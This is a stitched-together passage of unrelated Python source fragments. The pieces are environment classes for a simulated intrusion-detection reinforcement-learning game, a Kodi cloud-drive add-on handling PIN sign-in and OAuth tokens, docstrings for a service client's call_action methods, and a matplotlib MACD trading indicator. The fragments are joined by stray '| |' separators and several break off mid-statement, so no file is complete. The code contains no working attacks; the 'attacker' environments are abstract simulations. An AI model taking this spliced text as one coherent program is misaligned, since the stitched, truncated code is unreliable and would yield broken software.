idsgame_config.render_config.caption = "idsgame-v5"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
# -------- Version 6 ------------
class IdsGameRandomDefenseV6Env(AttackerEnv):
"""
[AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards]: Dense
[Version] 6
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
from gym_idsgame.agents.bot_agents.random_defense_bot_agent import RandomDefenseBotAgent
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
game_config.dense_rewards = True
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
defender_agent = RandomDefenseBotAgent(game_config)
idsgame_config = IdsGameConfig(game_config=game_config, defender_agent=defender_agent)
idsgame_config.render_config.caption = "idsgame-random_defense-v6"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameMinimalDefenseV6Env(AttackerEnv):
"""
[AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
defender following the "defend minimal strategy", connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards]: Dense
[Version] 6
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param save_dir: directory to save outputs of the env
:param initial_state_path: path to the initial state (if none, use default)
:param idsgame_config: configuration of the environment (if not specified a default config is used)
"""
from gym_idsgame.agents.bot_agents.defend_minimal_value_bot_agent import DefendMinimalValueBotAgent
if idsgame_config is None:
game_config = GameConfig(num_layers=4, num_servers_per_layer=5, num_attack_types=10, max_value=9)
game_config.set_initial_state(defense_val=2, attack_val=0, num_vulnerabilities_per_node=1, det_val=2,
vulnerability_val=0, num_vulnerabilities_per_layer=2)
game_config.network_config = NetworkConfig(game_config.num_rows, game_config.num_cols,
connected_layers=True)
game_config.dense_rewards = True
if initial_state_path is not None:
game_config.set_load_initial_state(initial_state_path)
defender_agent = DefendMinimalValueBotAgent(game_config)
idsgame_config = IdsGameConfig(game_config=game_config, defender_agent=defender_agent)
idsgame_config.render_config.caption = "idsgame-minimal_defense-v6"
super().__init__(idsgame_config=idsgame_config, save_dir=save_dir)
class IdsGameRandomAttackV6Env(DefenderEnv):
"""
[DefenderEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers
[Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
[Rewards] Dense
[Version] 6
[Observations] partially observed
[Environment] Deterministic
[Attacker Starting Position] Start node
[Reconnaissance activities] disabled
[Reconnaissance bool features] No
"""
def __init__(self, idsgame_config: IdsGameConfig = None, save_dir: str = None, initial_state_path: str = None):
"""
Initialization of the environment
:param | |
#-------------------------------------------------------------------------------
# Copyright (C) 2017 <NAME> (cguZZman) <EMAIL>
#
# This file is part of Cloud Drive Common Module for Kodi
#
# Cloud Drive Common Module for Kodi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Cloud Drive Common Module for Kodi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#-------------------------------------------------------------------------------
import inspect
import os
import sys
import threading
import time
import urllib
from urllib2 import HTTPError, URLError
import urlparse
from clouddrive.common.account import AccountManager, AccountNotFoundException, \
DriveNotFoundException
from clouddrive.common.cache.cache import Cache
from clouddrive.common.exception import UIException, ExceptionUtils, RequestException
from clouddrive.common.export import ExportManager
from clouddrive.common.remote.errorreport import ErrorReport
from clouddrive.common.remote.request import Request
from clouddrive.common.service.download import DownloadServiceUtil
from clouddrive.common.service.rpc import RemoteProcessCallable
from clouddrive.common.ui.dialog import DialogProgress, DialogProgressBG, \
QRDialogProgress, ExportMainDialog
from clouddrive.common.ui.logger import Logger
from clouddrive.common.ui.utils import KodiUtils
from clouddrive.common.utils import Utils
import xbmcgui
import xbmcplugin
import xbmcvfs
from datetime import timedelta, datetime
class CloudDriveAddon(RemoteProcessCallable):
_DEFAULT_SIGNIN_TIMEOUT = 120
_addon = None
_addon_handle = None
_addonid = None
_addon_name = None
_addon_params = None
_addon_url = None
_addon_version = None
_common_addon = None
_cancel_operation = False
_content_type = None
_dialog = None
_exporting = None
_export_manager = None
_exporting_target = 0
_exporting_percent = 0
_exporting_count = 0
_child_count_supported = True
_auto_refreshed_slideshow_supported = True
_load_target = 0
_load_count = 0
_profile_path = None
_progress_dialog = None
_progress_dialog_bg = None
_export_progress_dialog_bg = None
_system_monitor = None
_video_file_extensions = [x for x in KodiUtils.get_supported_media("video") if x not in ('','zip')]
_audio_file_extensions = KodiUtils.get_supported_media("music")
_image_file_extensions = KodiUtils.get_supported_media("picture")
_account_manager = None
_action = None
_ip_before_pin = None
def __init__(self):
self._addon = KodiUtils.get_addon()
self._addonid = self._addon.getAddonInfo('id')
self._addon_name = self._addon.getAddonInfo('name')
self._addon_url = sys.argv[0]
self._addon_version = self._addon.getAddonInfo('version')
self._common_addon_id = 'script.module.clouddrive.common'
self._common_addon = KodiUtils.get_addon(self._common_addon_id)
self._common_addon_version = self._common_addon.getAddonInfo('version')
self._dialog = xbmcgui.Dialog()
self._profile_path = Utils.unicode(KodiUtils.translate_path(self._addon.getAddonInfo('profile')))
self._progress_dialog = DialogProgress(self._addon_name)
self._progress_dialog_bg = DialogProgressBG(self._addon_name)
self._export_progress_dialog_bg = DialogProgressBG(self._addon_name)
self._system_monitor = KodiUtils.get_system_monitor()
self._account_manager = AccountManager(self._profile_path)
self._pin_dialog = None
self.iskrypton = KodiUtils.get_home_property('iskrypton') == 'true'
if len(sys.argv) > 1:
self._addon_handle = int(sys.argv[1])
self._addon_params = urlparse.parse_qs(sys.argv[2][1:])
for param in self._addon_params:
self._addon_params[param] = self._addon_params.get(param)[0]
self._content_type = Utils.get_safe_value(self._addon_params, 'content_type')
if not self._content_type:
wid = xbmcgui.getCurrentWindowId()
if wid == 10005 or wid == 10500 or wid == 10501 or wid == 10502:
self._content_type = 'audio'
elif wid == 10002:
self._content_type = 'image'
else:
self._content_type = 'video'
xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_UNSORTED )
xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_SIZE )
xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_DATE )
xbmcplugin.addSortMethod(handle=self._addon_handle, sortMethod=xbmcplugin.SORT_METHOD_DURATION )
def __del__(self):
del self._addon
del self._common_addon
del self._dialog
del self._progress_dialog
del self._progress_dialog_bg
del self._export_progress_dialog_bg
del self._system_monitor
del self._account_manager
def get_provider(self):
raise NotImplementedError()
def get_my_files_menu_name(self):
return self._common_addon.getLocalizedString(32052)
def get_custom_drive_folders(self, driveid):
return
def cancel_operation(self):
return self._system_monitor.abortRequested() or self._progress_dialog.iscanceled() or self._cancel_operation or (self._pin_dialog and self._pin_dialog.iscanceled())
def _get_display_name(self, account, drive=None, with_format=False):
return self._account_manager.get_account_display_name(account, drive, self.get_provider(), with_format)
def get_accounts(self, with_format=False):
accounts = self._account_manager.load()
for account_id in accounts:
account = accounts[account_id]
for drive in account['drives']:
drive['display_name'] = self._get_display_name(account, drive, with_format)
return accounts
def list_accounts(self):
accounts = self.get_accounts(with_format=True)
listing = []
for account_id in accounts:
account = accounts[account_id]
size = len(account['drives'])
for drive in account['drives']:
context_options = []
params = {'action':'_search', 'content_type': self._content_type, 'driveid': drive['id']}
cmd = 'ActivateWindow(%d,%s?%s)' % (xbmcgui.getCurrentWindowId(), self._addon_url, urllib.urlencode(params))
context_options.append((self._common_addon.getLocalizedString(32039), cmd))
params['action'] = '_remove_account'
context_options.append((self._common_addon.getLocalizedString(32006), 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'))
if size > 1:
params['action'] = '_remove_drive'
cmd = 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'
context_options.append((self._common_addon.getLocalizedString(32007), cmd))
list_item = xbmcgui.ListItem(drive['display_name'])
list_item.addContextMenuItems(context_options)
params = {'action':'_list_drive', 'content_type': self._content_type, 'driveid': drive['id']}
url = self._addon_url + '?' + urllib.urlencode(params)
listing.append((url, list_item, True))
list_item = xbmcgui.ListItem(self._common_addon.getLocalizedString(32005))
params = {'action':'_add_account', 'content_type': self._content_type}
url = self._addon_url + '?' + urllib.urlencode(params)
listing.append((url, list_item))
xbmcplugin.addDirectoryItems(self._addon_handle, listing, len(listing))
xbmcplugin.endOfDirectory(self._addon_handle, True)
def _add_account(self):
request_params = {
'waiting_retry': lambda request, remaining: self._progress_dialog_bg.update(
int((request.current_delay - remaining)/request.current_delay*100),
heading=self._common_addon.getLocalizedString(32043) % ('' if request.current_tries == 1 else ' again'),
message=self._common_addon.getLocalizedString(32044) % str(int(remaining)) + ' ' +
self._common_addon.getLocalizedString(32045) % (str(request.current_tries + 1), str(request.tries))
),
'on_complete': lambda request: (self._progress_dialog.close(), self._progress_dialog_bg.close()),
'cancel_operation': self.cancel_operation,
'wait': self._system_monitor.waitForAbort
}
provider = self.get_provider()
self._progress_dialog.update(0, self._common_addon.getLocalizedString(32008))
self._ip_before_pin = Request(KodiUtils.get_signin_server() + '/ip', None).request()
pin_info = provider.create_pin(request_params)
self._progress_dialog.close()
if self.cancel_operation():
return
if not pin_info:
raise Exception('Unable to retrieve a pin code')
tokens_info = {}
request_params['on_complete'] = lambda request: self._progress_dialog_bg.close()
self._pin_dialog = QRDialogProgress.create(self._addon_name,
KodiUtils.get_signin_server() + '/signin/%s' % pin_info['pin'],
self._common_addon.getLocalizedString(32009),
self._common_addon.getLocalizedString(32010) % ('[B]%s[/B]' % KodiUtils.get_signin_server(), '[B][COLOR lime]%s[/COLOR][/B]' % pin_info['pin']))
self._pin_dialog.show()
max_waiting_time = time.time() + self._DEFAULT_SIGNIN_TIMEOUT
while not self.cancel_operation() and max_waiting_time > time.time():
remaining = round(max_waiting_time-time.time())
percent = int(remaining/self._DEFAULT_SIGNIN_TIMEOUT*100)
self._pin_dialog.update(percent, line3='[CR]'+self._common_addon.getLocalizedString(32011) % str(int(remaining)) + '[CR][CR]Your source id is: %s' % Utils.get_source_id(self._ip_before_pin))
if int(remaining) % 5 == 0 or remaining == 1:
tokens_info = provider.fetch_tokens_info(pin_info, request_params = request_params)
if self.cancel_operation() or tokens_info:
break
if self._system_monitor.waitForAbort(1):
break
self._pin_dialog.close()
if self.cancel_operation() or time.time() >= max_waiting_time:
return
if not tokens_info:
raise Exception('Unable to retrieve the auth2 tokens')
self._progress_dialog.update(25, self._common_addon.getLocalizedString(32064),' ',' ')
try:
account = provider.get_account(request_params = request_params, access_tokens = tokens_info)
except Exception as e:
raise UIException(32065, e)
if self.cancel_operation():
return
self._progress_dialog.update(50, self._common_addon.getLocalizedString(32017))
try:
account['drives'] = provider.get_drives(request_params = request_params, access_tokens = tokens_info)
except Exception as e:
raise UIException(32018, e)
if self.cancel_operation():
return
self._progress_dialog.update(75, self._common_addon.getLocalizedString(32020))
try:
account['access_tokens'] = tokens_info
self._account_manager.add_account(account)
except Exception as e:
raise UIException(32021, e)
if self.cancel_operation():
return
self._progress_dialog.update(90)
try:
accounts = self._account_manager.load()
for drive in account['drives']:
driveid = drive['id']
Logger.debug('Looking for account %s...' % driveid)
if driveid in accounts:
drive = accounts[driveid]['drives'][0]
Logger.debug(drive)
if drive['id'] == driveid and drive['type'] == 'migrated':
Logger.debug('Account %s removed.' % driveid)
self._account_manager.remove_account(driveid)
except Exception as e:
pass
if self.cancel_operation():
return
self._progress_dialog.close()
KodiUtils.executebuiltin('Container.Refresh')
def _remove_drive(self, driveid):
self._account_manager.load()
account = self._account_manager.get_account_by_driveid(driveid)
drive = self._account_manager.get_drive_by_driveid(driveid)
if self._dialog.yesno(self._addon_name, self._common_addon.getLocalizedString(32023) % self._get_display_name(account, drive, True), None):
self._account_manager.remove_drive(driveid)
KodiUtils.executebuiltin('Container.Refresh')
def _remove_account(self, driveid):
self._account_manager.load()
account = self._account_manager.get_account_by_driveid(driveid)
if self._dialog.yesno(self._addon_name, self._common_addon.getLocalizedString(32022) % self._get_display_name(account, with_format=True), None):
self._account_manager.remove_account(account['id'])
KodiUtils.executebuiltin('Container.Refresh')
def _list_drive(self, driveid):
drive_folders = self.get_custom_drive_folders(driveid)
if self.cancel_operation():
return
if drive_folders:
listing = []
url = self._addon_url + '?' + urllib.urlencode({'action':'_list_folder', 'path': '/', 'content_type': self._content_type, 'driveid': driveid})
listing.append((url, xbmcgui.ListItem('[B]%s[/B]' % self.get_my_files_menu_name()), True))
for folder in drive_folders:
params = {'action':'_list_folder', 'path': folder['path'], 'content_type': self._content_type, 'driveid': driveid}
if 'params' in folder:
params.update(folder['params'])
url = self._addon_url + '?' + urllib.urlencode(params)
list_item = xbmcgui.ListItem(Utils.unicode(folder['name']))
if 'context_options' in folder:
list_item.addContextMenuItems(folder['context_options'])
listing.append((url, list_item, True))
if self._content_type == 'video' or self._content_type == 'audio':
url = self._addon_url + '?' + urllib.urlencode({'action':'_list_exports', 'content_type': self._content_type, 'driveid': driveid})
listing.append((url, xbmcgui.ListItem(self._common_addon.getLocalizedString(32000)), True))
xbmcplugin.addDirectoryItems(self._addon_handle, listing, len(listing))
xbmcplugin.endOfDirectory(self._addon_handle, True)
else:
self._list_folder(driveid, path='/')
def _list_exports(self, driveid):
self._export_manager = ExportManager(self._account_manager._addon_data_path)
exports = self._export_manager.load()
listing = []
for exportid in exports:
export = exports[exportid]
if export['driveid'] == driveid and export['content_type'] == self._content_type:
item_name = Utils.unicode(export['name'])
params = {'action':'_open_export', 'content_type': self._content_type, 'driveid': driveid, 'item_driveid': export['item_driveid'], 'item_id': export['id'], 'name': urllib.quote(Utils.str(item_name))}
url = self._addon_url + '?' + urllib.urlencode(params)
list_item = xbmcgui.ListItem(item_name)
context_options = []
params['action'] = '_run_export'
context_options.append((KodiUtils.localize(21479), 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'))
params['action'] = '_remove_export'
context_options.append((KodiUtils.localize(1210), 'RunPlugin('+self._addon_url + '?' + urllib.urlencode(params)+')'))
list_item.addContextMenuItems(context_options)
listing.append((url, list_item, True))
xbmcplugin.addDirectoryItems(self._addon_handle, listing, len(listing))
xbmcplugin.endOfDirectory(self._addon_handle, True)
def _remove_export(self, driveid, item_id):
self._export_manager = ExportManager(self._account_manager._addon_data_path)
item = self._export_manager.load()[item_id]
remove_export = self._dialog.yesno(self._addon_name, self._common_addon.getLocalizedString(32001) % Utils.unicode(item['name']))
if remove_export:
keep_locals = self._dialog.yesno(self._addon_name, self._common_addon.getLocalizedString(32086) % Utils.unicode(item['name']))
if not keep_locals:
self._export_manager.remove_export(item_id, False)
else:
self._export_manager.remove_export(item_id)
KodiUtils.executebuiltin('Container.Refresh')
def _open_export(self, driveid, item_driveid, item_id, name):
export_dialog = ExportMainDialog.create(self._content_type, driveid, item_driveid, item_id, name, self._account_manager, self.get_provider())
export_dialog.doModal()
if export_dialog.run:
t = threading.Thread(target=self._run_export, args=(driveid, item_id,))
t.setDaemon(True)
t.start()
def _run_export(self, driveid, item_id=None):
self._export_manager = ExportManager(self._account_manager._addon_data_path)
export = self._export_manager.load()[item_id]
Logger.debug('Running export:')
Logger.debug(export)
if Utils.get_safe_value(export, 'exporting', False):
self._dialog.ok(self._addon_name, self._common_addon.getLocalizedString(32059) + ' ' + self._common_addon.getLocalizedString(32038))
else:
export['exporting'] = True
self._export_manager.save()
export_folder = export['destination_folder']
if xbmcvfs.exists(export_folder):
self.get_provider().configure(self._account_manager, driveid)
self._export_progress_dialog_bg.create(self._addon_name + ' ' + self._common_addon.getLocalizedString(32024), self._common_addon.getLocalizedString(32025))
self._export_progress_dialog_bg.update(0)
item = self.get_provider().get_item(export['item_driveid'], item_id)
if self.cancel_operation():
return
if self._child_count_supported:
self._exporting_target = int(item['folder']['child_count'])
self._exporting_target += 1
folder_name = Utils.unicode(item['name'])
folder_path = os.path.join(os.path.join(export_folder, folder_name), '')
if self._addon.getSetting('clean_folder') != 'true' or not xbmcvfs.exists(folder_path) or Utils.remove_folder(folder_path):
self._exporting = item_id
export_items_info = {}
ExportManager.add_item_info(export_items_info, item_id, folder_name, | |
errors), available as an
`actions` property on the exception instance.
:type actions: list[ActionResponse]
"""
self.actions = actions or []
def __str__(self):
errors_string = '\n'.join(['{a.action}: {a.errors}'.format(a=a) for a in self.actions])
return 'Error calling action(s):\n{}'.format(errors_string)
# Blocking methods that send a request and wait until a response is available
def call_action(self, service_name, action, body=None, **kwargs):
"""
Build and send a single job request with one action.
Returns the action response or raises an exception if the action response is an error (unless
`raise_action_errors` is passed as `False`) or if the job response is an error (unless `raise_job_errors` is
passed as `False`).
:param service_name: The name of the service to call
:type service_name: union[str, unicode]
:param action: The name of the action to call
:type action: union[str, unicode]
:param body: The action request body
:type body: dict
:param expansions: A dictionary representing the expansions to perform
:type expansions: dict
:param raise_job_errors: Whether to raise a JobError if the job response contains errors (defaults to `True`)
:type raise_job_errors: bool
:param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
to `True`)
:type raise_action_errors: bool
:param timeout: If provided, this will override the default transport timeout values to; requests will expire
after this number of seconds plus some buffer defined by the transport, and the client will not
block waiting for a response for longer than this amount of time.
:type timeout: int
:param switches: A list of switch value integers
:type switches: list
:param correlation_id: The request correlation ID
:type correlation_id: union[str, unicode]
:param continue_on_error: Whether to continue executing further actions once one action has returned errors
:type continue_on_error: bool
:param context: A dictionary of extra values to include in the context header
:type context: dict
:param control_extra: A dictionary of extra values to include in the control header
:type control_extra: dict
:return: The action response
:rtype: ActionResponse
:raise: ConnectionError, InvalidField, MessageSendError, MessageSendTimeout, MessageTooLarge,
MessageReceiveError, MessageReceiveTimeout, InvalidMessage, JobError, CallActionError
"""
return self.call_action_future(service_name, action, body, **kwargs).result()
def call_actions(
self,
service_name,
actions,
expansions=None,
raise_job_errors=True,
raise_action_errors=True,
timeout=None,
**kwargs
):
"""
Build and send a single job request with one or more actions.
Returns a list of action responses, one for each action in the same order as provided, or raises an exception
if any action response is an error (unless `raise_action_errors` is passed as `False`) or if the job response
is an error (unless `raise_job_errors` is passed as `False`).
This method performs expansions if the Client is configured with an expansion converter.
:param service_name: The name of the service to call
:type service_name: union[str, unicode]
:param actions: A list of `ActionRequest` objects and/or dicts that can be converted to `ActionRequest` objects
:type actions: iterable[union[ActionRequest, dict]]
:param expansions: A dictionary representing the expansions to perform
:type expansions: dict
:param raise_job_errors: Whether to raise a JobError if the job response contains errors (defaults to `True`)
:type raise_job_errors: bool
:param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
to `True`)
:type raise_action_errors: bool
:param timeout: If provided, this will override the default transport timeout values to; requests will expire
after this number of seconds plus some buffer defined by the transport, and the client will not
block waiting for a response for longer than this amount of time.
:type timeout: int
:param switches: A list of switch value integers
:type switches: list
:param correlation_id: The request correlation ID
:type correlation_id: union[str, unicode]
:param continue_on_error: Whether to continue executing further actions once one action has returned errors
:type continue_on_error: bool
:param context: A dictionary of extra values to include in the context header
:type context: dict
:param control_extra: A dictionary of extra values to include in the control header
:type control_extra: dict
:return: The job response
:rtype: JobResponse
:raise: ConnectionError, InvalidField, MessageSendError, MessageSendTimeout, MessageTooLarge,
MessageReceiveError, MessageReceiveTimeout, InvalidMessage, JobError, CallActionError
"""
return self.call_actions_future(
service_name,
actions,
expansions,
raise_job_errors,
raise_action_errors,
timeout,
**kwargs
).result()
def call_actions_parallel(self, service_name, actions, **kwargs):
"""
Build and send multiple job requests to one service, each job with one action, to be executed in parallel, and
return once all responses have been received.
Returns a list of action responses, one for each action in the same order as provided, or raises an exception
if any action response is an error (unless `raise_action_errors` is passed as `False`) or if any job response
is an error (unless `raise_job_errors` is passed as `False`).
This method performs expansions if the Client is configured with an expansion converter.
:param service_name: The name of the service to call
:type service_name: union[str, unicode]
:param actions: A list of `ActionRequest` objects and/or dicts that can be converted to `ActionRequest` objects
:type actions: iterable[union[ActionRequest, dict]]
:param expansions: A dictionary representing the expansions to perform
:type expansions: dict
:param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
to `True`)
:type raise_action_errors: bool
:param timeout: If provided, this will override the default transport timeout values to; requests will expire
after this number of seconds plus some buffer defined by the transport, and the client will not
block waiting for a response for longer than this amount of time.
:type timeout: int
:param switches: A list of switch value integers
:type switches: list
:param correlation_id: The request correlation ID
:type correlation_id: union[str, unicode]
:param continue_on_error: Whether to continue executing further actions once one action has returned errors
:type continue_on_error: bool
:param context: A dictionary of extra values to include in the context header
:type context: dict
:param control_extra: A dictionary of extra values to include in the control header
:type control_extra: dict
:return: A generator of action responses
:rtype: Generator[ActionResponse]
:raise: ConnectionError, InvalidField, MessageSendError, MessageSendTimeout, MessageTooLarge,
MessageReceiveError, MessageReceiveTimeout, InvalidMessage, JobError, CallActionError
"""
return self.call_actions_parallel_future(service_name, actions, **kwargs).result()
def call_jobs_parallel(
self,
jobs,
expansions=None,
raise_job_errors=True,
raise_action_errors=True,
catch_transport_errors=False,
timeout=None,
**kwargs
):
"""
Build and send multiple job requests to one or more services, each with one or more actions, to be executed in
parallel, and return once all responses have been received.
Returns a list of job responses, one for each job in the same order as provided, or raises an exception if any
job response is an error (unless `raise_job_errors` is passed as `False`) or if any action response is an
error (unless `raise_action_errors` is passed as `False`).
This method performs expansions if the Client is configured with an expansion converter.
:param jobs: A list of job request dicts, each containing `service_name` and `actions`, where `actions` is a
list of `ActionRequest` objects and/or dicts that can be converted to `ActionRequest` objects
:type jobs: iterable[dict(service_name=union[str, unicode], actions=list[union[ActionRequest, dict]])]
:param expansions: A dictionary representing the expansions to perform
:type expansions: dict
:param raise_job_errors: Whether to raise a JobError if any job responses contain errors (defaults to `True`)
:type raise_job_errors: bool
:param raise_action_errors: Whether to raise a CallActionError if any action responses contain errors (defaults
to `True`)
:type raise_action_errors: bool
:param catch_transport_errors: Whether to catch transport errors and return them instead of letting them
propagate. By default (`False`), the errors `ConnectionError`,
`InvalidMessageError`, `MessageReceiveError`, `MessageReceiveTimeout`,
`MessageSendError`, `MessageSendTimeout`, and `MessageTooLarge`, when raised by
the transport, cause the entire process to terminate, potentially losing
responses. If this argument is set to `True`, those errors are, instead, caught,
and they are returned in place of their corresponding responses in the returned
list of job responses.
:type catch_transport_errors: bool
:param timeout: If provided, this will override the default transport timeout values to; requests will expire
after this number of seconds plus some buffer defined by the transport, and the client will not
block waiting for a response for longer than this amount of time.
:type timeout: int
:param switches: A list of switch value integers
:type switches: list
:param correlation_id: The request correlation ID
:type correlation_id: union[str, unicode]
:param continue_on_error: Whether to continue executing further actions once one action has | |
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from abc import ABC, abstractmethod
class Indicator(ABC):
# abstract Indicator class
# outlines functions required by indicator classes
def __init__(self, ax, xlims):
# All indicators have these attributes initialized
# Make sure the indicator class calls super()
self.ax = ax
self.xlims = xlims
self.active = False
self.removeX = ax.text(0,0, "[X]", fontsize=9, color="#9e9e9e")
self.ax.set_facecolor("#1e1e1e")
@abstractmethod
def initPlot(self, i):
# plot data calculated in loadHistory on indicator axis
# store the chart object (artist) as an attribute
pass
@abstractmethod
def loadHistory(self, ohlc, data, vol, histCnt):
# Calculate the indicator history using history data
# store data as class attribute
pass
@abstractmethod
def update(self, ohlc, vol, currInt, retain=True):
# update the most recent data point
# if not retain:
# <time period incremented>
# permanently store the most recent data point
# append new data point
pass
@abstractmethod
def draw(self, currInt):
# Update the chart object with the recently updated data point
pass
@abstractmethod
def drawArtists(self, redraw):
# Actually perform the drawing function
# if redraw:
# draw artists that DON'T get redrawn every frame
# else:
# draw artists that DO get redrawn every frame
pass
# --- Inherit these, don't override --- #
def X_Clicked(self, event):
return self.removeX.contains(event)[0]
class MACD(Indicator):
def __init__(self, ax, xlims, ema1=26, ema2=12, ema3=9):
super(MACD, self).__init__(ax, xlims)
self.macdBars = []
self.macd = []
self.ema1 = 0
self.ema2 = 0
self.ema3 = 0
self.ema1pd = ema1
self.ema2pd = ema2
self.ema3pd = ema3
self.ema1Wt = 2 / (self.ema1pd+1)
self.ema2Wt = 2 / (self.ema2pd+1)
self.ema3Wt = 2 / (self.ema3pd+1)
self.deriv = []
self.derivLine = None
self.deriv_dx = 2
self.green = "#22d615"
self.red = "#ea2222"
self.ax.set_ylabel("MACD (%d, %d, %d)" % (self.ema2pd, self.ema1pd, self.ema3pd), fontsize=9)
def initPlot(self, i):
self.macdBars = self.ax.bar(range(i+1), self.macd).patches
for bar,v in zip(self.macdBars, self.macd):
bar.set_height(v)
if v < 0: bar.set_color(self.red)
else: bar.set_color(self.green)
self.derivLine, = self.ax.plot(range(self.deriv_dx, i+1), self.deriv, "-", c="white", linewidth=0.7)
def calcEMAfromHistory(self, data, histCnt):
numEx = len(data)
ema1Start = histCnt + self.ema1pd+self.ema3pd
ema2Start = min(ema1Start - (self.ema1pd-self.ema2pd), histCnt + self.ema2pd+self.ema3pd)
# First EMA value is a SMA
# calculate SMA for first X intervals of emaX
for i in range(self.ema1pd):
# price ema 1
idx = ema1Start-1-i
temp = [float(x[idx][4]) for x in data if x[idx][-1]] # data has been modified so last element is bool classifying its validity
self.ema1 += sum(temp) / len(temp)
# price ema 2
if i < self.ema2pd:
idx = ema2Start-1-i
self.ema2 += sum(temp) / len(temp)#sum([float(x[idx][4]) for x in data]) / numEx
self.ema1 /= self.ema1pd
self.ema2 /= self.ema2pd
self.ema3 += (self.ema2 - self.ema1)
# calculate SMA of (ema2-ema1)
for i in range(self.ema3pd-1,0,-1):
idx = histCnt+i
temp = [float(x[idx][4]) for x in data if x[idx][-1]]
p = sum(temp) / len(temp)
# ema = price * ema_weight + prev_ema * (1 - ema_weight)
self.ema1 = p * self.ema1Wt + self.ema1 * (1 - self.ema1Wt)
self.ema2 = p * self.ema2Wt + self.ema2 * (1 - self.ema2Wt)
self.ema3 += (self.ema2 - self.ema1)
self.ema3 /= self.ema3pd
def loadHistory(self, ohlc, data, vol, histCnt):
# MACD = EMA_9 of (EMA_12 - EMA_26)
# Derivative = (MACD_i+2 - MACD_i) / 2
# calculate EMAs for history data before displayed data
self.calcEMAfromHistory(data, histCnt)
for i in range(histCnt):
idx = histCnt - i - 1
if idx == 0:
self.macd.append(0)
self.deriv.append(0)
continue
self.ema1 = ohlc[i][4] * self.ema1Wt + self.ema1 * (1-self.ema1Wt)
self.ema2 = ohlc[i][4] * self.ema2Wt + self.ema2 * (1-self.ema2Wt)
self.ema3 = (self.ema2-self.ema1) * self.ema3Wt + self.ema3 * (1-self.ema3Wt)
self.macd.append((self.ema2-self.ema1) - self.ema3)
if i >= self.deriv_dx:
self.deriv.append((self.macd[i] - self.macd[i-self.deriv_dx]) / self.deriv_dx)
def update(self, ohlc, vol, currInt, retain=True):
tempEMA1 = ohlc[currInt][4] * self.ema1Wt + self.ema1 * (1 - self.ema1Wt)
tempEMA2 = ohlc[currInt][4] * self.ema2Wt + self.ema2 * (1 - self.ema2Wt)
tempEMA3 = (tempEMA2 - tempEMA1) * self.ema3Wt + self.ema3 * (1 - self.ema3Wt)
self.macd[currInt] = (tempEMA2 - tempEMA1) - tempEMA3
self.deriv[-1] = (self.macd[-1] - self.macd[-3]) / self.deriv_dx
if not retain:
self.ema1 = tempEMA1
self.ema2 = tempEMA2
self.ema3 = tempEMA3
self.addBar(currInt+1)
self.deriv.append(0)
def addBar(self, i):
self.macd.append(0)
self.macdBars.append(mpatches.Rectangle((i - 0.4, 0), width=0.8, height=0))
self.ax.add_patch(self.macdBars[-1])
def draw(self, currInt):
try:
self.macdBars[currInt].set_height(self.macd[currInt])
if self.macd[currInt] < 0:
self.macdBars[currInt].set_color(self.red)
else:
self.macdBars[currInt].set_color(self.green)
self.derivLine.set_data(range(self.deriv_dx,currInt+1), self.deriv)
# find min and max values being plotted to set the bounds of the y-axis
maxMacd = max(self.macd[max(0, self.xlims[0]):self.xlims[1]])
minMacd = min(self.macd[max(0, self.xlims[0]):self.xlims[1]])
maxDeriv = max(self.deriv[max(0, self.xlims[0]):self.xlims[1]])
minDeriv = min(self.deriv[max(0, self.xlims[0]):self.xlims[1]])
maxMacd = max(maxMacd, maxDeriv)
minMacd = min(minMacd, minDeriv)
buf = (maxMacd - minMacd) * 0.12
self.ax.set_ylim(min(0, minMacd - buf), max(0, maxMacd+buf))
if self.active: self.removeX.set_text("[X]")
else: self.removeX.set_text("")
